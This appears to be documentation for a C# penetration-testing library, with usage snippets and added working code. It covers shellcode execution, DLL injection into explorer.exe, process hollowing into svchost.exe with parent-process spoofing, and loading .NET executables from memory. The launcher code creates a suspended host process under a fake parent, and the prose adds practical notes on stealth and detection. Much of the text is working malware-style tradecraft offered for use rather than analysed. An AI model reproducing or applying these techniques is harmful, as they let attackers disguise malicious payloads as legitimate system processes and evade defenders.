Basic implementations of certain penetration testing routines, such as code injection.
Shellcode
The Shellcode class handles compiled machine code (shellcode). Such code is typically position independent, because it is copied to whatever address the allocator returns and cannot rely on being loaded at a fixed base. To run a byte array of shellcode, call Execute:
byte[] compiledInstructions = ...;
Shellcode.Execute(compiledInstructions);
To extract the code section from an executable file, use ExtractFromExecutable. Note that the result is the raw content of the image's code section, not standalone shellcode: the code of an ordinary executable such as explorer.exe calls imports through its import table and references data and absolute addresses outside that section, so it will not run if simply copied elsewhere and jumped to.
byte[] exeFile = File.ReadAllBytes(@"C:\Windows\explorer.exe");
byte[] textSection = Shellcode.ExtractFromExecutable(exeFile);
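How the code section is located inside a PE image, as an added example that is not the library's code (the page does not say how ExtractFromExecutable selects the section; this example picks the first section whose characteristics carry IMAGE_SCN_CNT_CODE, which covers `.text` and renamed code sections alike). It walks the DOS header, the PE signature, the file header and the section table, and bounds-checks the raw data pointer before copying.

```csharp
using System;
using System.IO;
using System.Text;

// Added example, not the library's code: return the raw bytes of the first code
// section of a PE image held in memory.
static class PeCodeSection
{
    const uint IMAGE_SCN_CNT_CODE = 0x00000020;   // section characteristics flag

    public static byte[] Extract(byte[] image)
    {
        using var reader = new BinaryReader(new MemoryStream(image));

        if (reader.ReadUInt16() != 0x5A4D)                      // "MZ"
            throw new BadImageFormatException("missing MZ signature");
        reader.BaseStream.Position = 0x3C;                      // IMAGE_DOS_HEADER.e_lfanew
        int peOffset = reader.ReadInt32();
        if (peOffset < 0 || peOffset + 24 > image.Length)
            throw new BadImageFormatException("e_lfanew points outside the file");

        reader.BaseStream.Position = peOffset;
        if (reader.ReadUInt32() != 0x00004550)                  // "PE\0\0"
            throw new BadImageFormatException("missing PE signature");

        // IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
        // PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
        reader.ReadUInt16();                                    // Machine
        ushort sectionCount = reader.ReadUInt16();
        reader.BaseStream.Position += 12;                       // three DWORDs we do not need
        ushort optionalHeaderSize = reader.ReadUInt16();
        reader.ReadUInt16();                                    // Characteristics

        // The section table follows the optional header; each IMAGE_SECTION_HEADER is 40 bytes.
        long sectionTable = reader.BaseStream.Position + optionalHeaderSize;
        for (int i = 0; i < sectionCount; i++)
        {
            reader.BaseStream.Position = sectionTable + i * 40L;
            string name = Encoding.ASCII.GetString(reader.ReadBytes(8)).TrimEnd('\0');
            reader.ReadUInt32();                                // VirtualSize
            reader.ReadUInt32();                                // VirtualAddress
            uint rawSize = reader.ReadUInt32();                 // SizeOfRawData
            uint rawOffset = reader.ReadUInt32();               // PointerToRawData
            reader.BaseStream.Position += 12;                   // relocation/line-number pointers and counts
            uint characteristics = reader.ReadUInt32();

            if ((characteristics & IMAGE_SCN_CNT_CODE) == 0)
                continue;

            // Never trust the header: a crafted file can point past the end of the buffer.
            if ((long)rawOffset + rawSize > image.Length)
                throw new BadImageFormatException($"section {name} points outside the file");

            byte[] code = new byte[rawSize];
            Buffer.BlockCopy(image, (int)rawOffset, code, 0, (int)rawSize);
            return code;
        }
        throw new BadImageFormatException("no section flagged IMAGE_SCN_CNT_CODE");
    }
}
```

SizeOfRawData is rounded up to the file alignment, so the returned array may carry padding zeros after the last instruction; use VirtualSize instead if the exact in-memory length matters.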
DllInjection
To inject a DLL into a running process, use DllInjection.Inject:
using System.Diagnostics;

// GetProcessesByName returns an empty array when no such process exists, so [0] throws in that case.
using Process process = Process.GetProcessesByName("explorer")[0];
DllInjection.Inject(process, @"C:\path\to\library.dll");
ExecutableInjection
To perform process hollowing, use the RunPE method. Hollowing starts a legitimate host executable (here svchost.exe) in a suspended state, replaces its image in memory with the payload, and then resumes it, so the payload runs under the host's name and path. An optional parameter enables parent process spoofing, which makes the new process appear in the process tree as a child of the given PID rather than of the injector.
byte[] exeFile = ...;
int spoofedParentProcessId = ...;
ExecutableInjection.RunPE(@"C:\Windows\System32\svchost.exe", null, exeFile, spoofedParentProcessId);
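The parent-spoofing half of the above, as an added example that is not the library's code (the page does not describe RunPE's internals; on Windows the parent is chosen through the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute, which is what this uses). It creates the suspended host process with the spoofed parent, which is also the first step of hollowing; the image-swapping steps (unmap, write payload, set thread context, resume) are not shown.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example, not the library's code. Starts `hostPath` suspended with `parentPid`
// recorded as its parent. Assumes Windows Vista or later (STARTUPINFOEX).
static class SpoofedParentLauncher
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; }

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
    [DllImport("kernel32.dll")]
    static extern void DeleteProcThreadAttributeList(IntPtr lpAttributeList);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,
        bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    const uint PROCESS_CREATE_PROCESS = 0x0080;                 // the one right needed on the fake parent
    const uint CREATE_SUSPENDED = 0x00000004, EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
    const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;

    // Returns the suspended child's handles; the caller must ResumeThread (or hollow it) and close them.
    public static PROCESS_INFORMATION StartSuspended(string hostPath, int parentPid)
    {
        IntPtr hParent = OpenProcess(PROCESS_CREATE_PROCESS, false, parentPid);
        if (hParent == IntPtr.Zero)
            throw new InvalidOperationException("OpenProcess(parent) failed: " + Marshal.GetLastWin32Error());

        // First call only reports the required size; it "fails" with ERROR_INSUFFICIENT_BUFFER by design.
        IntPtr size = IntPtr.Zero;
        InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref size);
        IntPtr attrList = Marshal.AllocHGlobal(size);
        IntPtr hParentCell = Marshal.AllocHGlobal(IntPtr.Size);  // attribute value is a pointer to a HANDLE
        Marshal.WriteIntPtr(hParentCell, hParent);
        bool listReady = false;
        try
        {
            listReady = InitializeProcThreadAttributeList(attrList, 1, 0, ref size);
            if (!listReady || !UpdateProcThreadAttribute(attrList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                                         hParentCell, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero))
                throw new InvalidOperationException("attribute list setup failed: " + Marshal.GetLastWin32Error());

            var si = new STARTUPINFOEX { lpAttributeList = attrList };
            si.StartupInfo.cb = (uint)Marshal.SizeOf<STARTUPINFOEX>();
            if (!CreateProcess(hostPath, null, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,
                               IntPtr.Zero, null, ref si, out PROCESS_INFORMATION pi))
                throw new InvalidOperationException("CreateProcess failed: " + Marshal.GetLastWin32Error());
            return pi;
        }
        finally
        {
            if (listReady) DeleteProcThreadAttributeList(attrList);
            Marshal.FreeHGlobal(hParentCell);
            Marshal.FreeHGlobal(attrList);
            CloseHandle(hParent);
        }
    }
}
```

A call such as `StartSuspended(@"C:\Windows\System32\svchost.exe", spoofedParentProcessId)` yields a suspended svchost.exe whose parent is the given PID. The spoof only affects the recorded parent: the real creator is still visible to kernel-level telemetry (the process-creation callback reports the creating thread), and the chosen parent must run at an integrity level the caller can open with PROCESS_CREATE_PROCESS. For the hollowing steps that follow, host and payload must share the same architecture.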
To load and invoke a .NET executable from memory, use ExecuteDotNetAssembly:
byte[] dotNetExecutable = ...;
ExecutableInjection.ExecuteDotNetAssembly(dotNetExecutable, new[] { "arg1", "arg2" });
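What loading and invoking a managed executable from a byte array involves, as an added example that is not the library's code (the page does not describe ExecuteDotNetAssembly's behaviour). It handles the two legal Main signatures, returns the exit code, and rethrows the target's own exception instead of the reflection wrapper.

```csharp
using System;
using System.Reflection;
using System.Runtime.ExceptionServices;

// Added example, not the library's code. Runs the entry point of a .NET executable
// held in memory, inside the current process.
static class InMemoryAssemblyRunner
{
    // Returns the exit code Main produced (0 when Main returns void).
    public static int Run(byte[] image, string[] args)
    {
        // Assembly.Load(byte[]) maps the image without writing it to disk. The code runs
        // with this process's identity and privileges, and cannot be unloaded again without
        // a collectible AssemblyLoadContext (or a separate AppDomain on .NET Framework).
        Assembly assembly = Assembly.Load(image);
        MethodInfo entry = assembly.EntryPoint
            ?? throw new BadImageFormatException("image has no entry point (a library rather than an executable?)");

        // Main may be declared as Main() or Main(string[] args); pass arguments only in the second case.
        object[] parameters = entry.GetParameters().Length == 0 ? null : new object[] { args ?? new string[0] };
        try
        {
            object result = entry.Invoke(null, parameters);
            return result is int exitCode ? exitCode : 0;
        }
        catch (TargetInvocationException ex) when (ex.InnerException != null)
        {
            // Surface the payload's exception with its original stack instead of the reflection wrapper.
            ExceptionDispatchInfo.Capture(ex.InnerException).Throw();
            throw;   // unreachable; satisfies definite-return analysis
        }
    }
}
```

Two caveats a practitioner runs into with this pattern: a Main marked [STAThread] (typical for WinForms and WPF) is not given an STA apartment when invoked via reflection, so run such payloads on a thread you created with SetApartmentState(ApartmentState.STA); and calling Environment.Exit inside the payload terminates the host process, since both share it.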
- Initial release